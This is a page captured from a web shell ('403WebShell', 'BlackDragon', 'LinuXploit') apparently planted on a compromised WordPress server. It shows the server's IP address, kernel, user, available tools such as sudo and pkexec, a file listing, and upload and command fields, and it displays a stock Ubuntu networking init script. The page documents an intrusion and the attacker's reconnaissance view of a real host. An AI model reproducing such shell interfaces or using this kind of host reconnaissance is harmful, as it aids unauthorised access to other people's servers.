buyer kontol nego ga ngotak comecondo.com
 Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
 Apache/2.4.18 (Ubuntu)
 68.183.124.220
 Cant read /etc/named.conf
Name Type Size Owner/Group Permission Last Modified Actions
. dir - gavin/www-data drwxr-sr-x 2024-12-15 11:41:30
.. dir - root/root drwxr-xr-x 2019-08-25 02:29:45
.sucuriquarantine dir - root/www-data drwxr-sr-x 2024-05-24 05:31:33
home dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
worksheets dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
wp-admin dir - gavin/www-data drwxr-sr-x 2025-08-29 03:10:31
wp-content dir - gavin/www-data drwxrwsr-x 2026-05-23 05:31:31
wp-includes dir - gavin/www-data drwxr-sr-x 2021-06-27 11:01:30
.htaccess text/plain 201 B root/www-data -rw-r--r-- 2021-06-24 04:05:20
agent-contact-1.JPG image/jpeg 22.78 KB gavin/www-data -rw-rw-r-- 2022-01-31 05:13:10
circle-16.png image/png 268 B gavin/www-data -rw-rw-r-- 2021-01-11 04:23:00
index.html text/html 11.06 KB gavin/www-data -rw-r--r-- 2019-08-25 02:29:47
index.php text/x-php 420 B gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
license.txt text/plain 19.47 KB gavin/www-data -rw-r--r-- 2019-01-01 08:37:49
map.php text/html 1012 B gavin/www-data -rw-rw-r-- 2021-01-01 03:50:38
pin-8-16.png image/png 309 B gavin/www-data -rw-rw-r-- 2021-01-11 04:38:33
pin-8-24.png image/png 499 B gavin/www-data -rw-rw-r-- 2021-01-11 04:40:01
pin-blue-1.png image/png 28.16 KB gavin/www-data -rw-rw-r-- 2022-01-27 09:10:36
pin-green-1.png image/png 12.71 KB gavin/www-data -rw-rw-r-- 2022-01-27 09:23:52
pin-house-red-2.png image/png 1.36 KB gavin/www-data -rw-rw-r-- 2022-01-30 09:18:10
pin-house-red-3.png image/png 2.49 KB gavin/www-data -rw-rw-r-- 2022-01-30 09:20:50
readme.html text/html 7.27 KB gavin/www-data -rw-r--r-- 2019-04-08 10:59:56
wallpaper1.jpg image/jpeg 58.99 KB gavin/www-data -rw-rw-r-- 2022-01-29 05:15:06
wallpaper2.jpg image/jpeg 788.8 KB gavin/www-data -rw-rw-r-- 2022-02-01 11:27:14
wp-activate.php text/x-php 6.76 KB gavin/www-data -rw-r--r-- 2019-01-12 06:41:52
wp-blog-header.php text/x-php 369 B gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-comments-post.php text/x-php 2.23 KB gavin/www-data -rw-r--r-- 2019-01-21 01:34:51
wp-config-sample.php text/x-php 2.83 KB gavin/www-data -rw-r--r-- 2020-10-24 04:07:41
wp-config.php text/x-php 3.62 KB gavin/www-data -rw-r--r-- 2022-04-20 01:23:49
wp-cron.php text/x-php 3.76 KB gavin/www-data -rw-r--r-- 2019-01-09 08:37:51
wp-links-opml.php text/x-php 2.44 KB gavin/www-data -rw-r--r-- 2019-01-16 05:29:49
wp-load.php text/x-php 3.23 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-login.php text/x-php 38.62 KB gavin/www-data -rw-r--r-- 2019-06-10 01:34:45
wp-mail.php text/x-php 8.21 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
wp-settings.php text/x-php 18.52 KB gavin/www-data -rw-r--r-- 2019-03-28 07:04:51
wp-signup.php text/x-php 30.36 KB gavin/www-data -rw-r--r-- 2019-01-16 04:51:52
wp-trackback.php text/x-php 4.65 KB gavin/www-data -rw-r--r-- 2017-11-30 11:11:00
xmlrpc.php text/x-php 3 KB gavin/www-data -rw-r--r-- 2018-08-17 01:51:36
© BlackDragon
403WebShell
403Webshell
Server IP : 68.183.124.220  /  Your IP : 216.73.216.228
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux Sandbox-A 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : gavin ( 1000)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /etc/rcS.d/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /etc/rcS.d/S11networking
#!/bin/sh -e
### BEGIN INIT INFO
# Provides:          networking ifupdown
# Required-Start:    mountkernfs $local_fs urandom
# Required-Stop:     $local_fs
# Default-Start:     S
# Default-Stop:      0 6
# Short-Description: Raise network interfaces.
# Description:       Prepare /run/network directory, ifstate file and raise network interfaces, or take them down.
### END INIT INFO

PATH="/sbin:/bin"
RUN_DIR="/run/network"
IFSTATE="$RUN_DIR/ifstate"
STATEDIR="$RUN_DIR/state"

[ -x /sbin/ifup ] || exit 0
[ -x /sbin/ifdown ] || exit 0

. /lib/lsb/init-functions

CONFIGURE_INTERFACES=yes
EXCLUDE_INTERFACES=
VERBOSE=no

[ -f /etc/default/networking ] && . /etc/default/networking

verbose=""
[ "$VERBOSE" = yes ] && verbose=-v

process_exclusions() {
    set -- $EXCLUDE_INTERFACES
    exclusions=""
    for d
    do
	exclusions="-X $d $exclusions"
    done
    echo $exclusions
}

process_options() {
    [ -e /etc/network/options ] || return 0
    log_warning_msg "/etc/network/options still exists and it will be IGNORED! Please use /etc/sysctl.conf instead."
}

check_ifstate() {
    if [ ! -d "$RUN_DIR" ] ; then
	if ! mkdir -p "$RUN_DIR" ; then
	    log_failure_msg "can't create $RUN_DIR"
	    exit 1
	fi
	if ! chown root:netdev "$RUN_DIR" ; then
	    log_warning_msg "can't chown $RUN_DIR"
	fi
    fi
    if [ ! -r "$IFSTATE" ] ; then
	if ! :> "$IFSTATE" ; then
	    log_failure_msg "can't initialise $IFSTATE"
	    exit 1
	fi
    fi
}

check_network_file_systems() {
    [ -e /proc/mounts ] || return 0

    if [ -e /etc/iscsi/iscsi.initramfs ]; then
	log_warning_msg "not deconfiguring network interfaces: iSCSI root is mounted."
	exit 0
    fi

    while read DEV MTPT FSTYPE REST; do
	case $DEV in
	/dev/nbd*|/dev/nd[a-z]*|/dev/etherd/e*|curlftpfs*)
	    log_warning_msg "not deconfiguring network interfaces: network devices still mounted."
	    exit 0
	    ;;
	esac
	case $FSTYPE in
	nfs|nfs4|smbfs|ncp|ncpfs|cifs|coda|ocfs2|gfs|pvfs|pvfs2|fuse.httpfs|fuse.curlftpfs)
	    log_warning_msg "not deconfiguring network interfaces: network file systems still mounted."
	    exit 0
	    ;;
	esac
    done < /proc/mounts
}

check_network_swap() {
    [ -e /proc/swaps ] || return 0

    while read DEV MTPT FSTYPE REST; do
	case $DEV in
	/dev/nbd*|/dev/nd[a-z]*|/dev/etherd/e*)
	    log_warning_msg "not deconfiguring network interfaces: network swap still mounted."
	    exit 0
	    ;;
	esac
    done < /proc/swaps
}

ifup_hotplug () {
    if [ -d /sys/class/net ]
    then
	    ifaces=$(for iface in $(ifquery --list --allow=hotplug)
			    do
				    link=${iface##:*}
				    link=${link##.*}
				    if [ -e "/sys/class/net/$link" ]
				    then
					# link detection does not work unless we up the link
					ip link set "$iface" up || true
					if [ "$(cat /sys/class/net/$link/operstate)" = up ]
					then
					    echo "$iface"
					fi
				    fi
			    done)
	    if [ -n "$ifaces" ]
	    then
		ifup $ifaces "$@" || true
	    fi
    fi
}

case "$1" in
start)
	if init_is_upstart; then
		exit 1
	fi
	process_options
	check_ifstate

	if [ "$CONFIGURE_INTERFACES" = no ]
	then
	    log_action_msg "Not configuring network interfaces, see /etc/default/networking"
	    exit 0
	fi
	set -f
	exclusions=$(process_exclusions)
	log_action_begin_msg "Configuring network interfaces"
	if [ -x /sbin/udevadm ]; then
		if [ -n "$(ifquery --list --exclude=lo)" ] || [ -n "$(ifquery --list --allow=hotplug)" ]; then
			udevadm settle || true
		fi
	fi
	if ifup -a $exclusions $verbose && ifup_hotplug $exclusions $verbose
	then
	    log_action_end_msg $?
	else
	    log_action_end_msg $?
	fi
	;;

stop)
	if init_is_upstart; then
		exit 0
	fi
	check_network_file_systems
	check_network_swap

	log_action_begin_msg "Deconfiguring network interfaces"
	if ifdown -a --exclude=lo $verbose; then
	    log_action_end_msg $?
	else
	    log_action_end_msg $?
	fi
	;;

reload)
	if init_is_upstart; then
		exit 1
	fi
	process_options

	log_action_begin_msg "Reloading network interfaces configuration"
	state=$(ifquery --state)
	ifdown -a --exclude=lo $verbose || true
	if ifup --exclude=lo $state $verbose ; then
	    log_action_end_msg $?
	else
	    log_action_end_msg $?
	fi
	;;

force-reload|restart)
	if init_is_upstart; then
		exit 1
	fi
	process_options

	log_warning_msg "Running $0 $1 is deprecated because it may not re-enable some interfaces"
	log_action_begin_msg "Reconfiguring network interfaces"
	ifdown -a --exclude=lo $verbose || true
	set -f
	exclusions=$(process_exclusions)
	if ifup -a --exclude=lo $exclusions $verbose && ifup_hotplug $exclusions $verbose
	then
	    log_action_end_msg $?
	else
	    log_action_end_msg $?
	fi
	;;

*)
	echo "Usage: /etc/init.d/networking {start|stop|reload|restart|force-reload}"
	exit 1
	;;
esac

exit 0

# vim: noet ts=8

Youez - 2016 - github.com/yon3zu
LinuXploit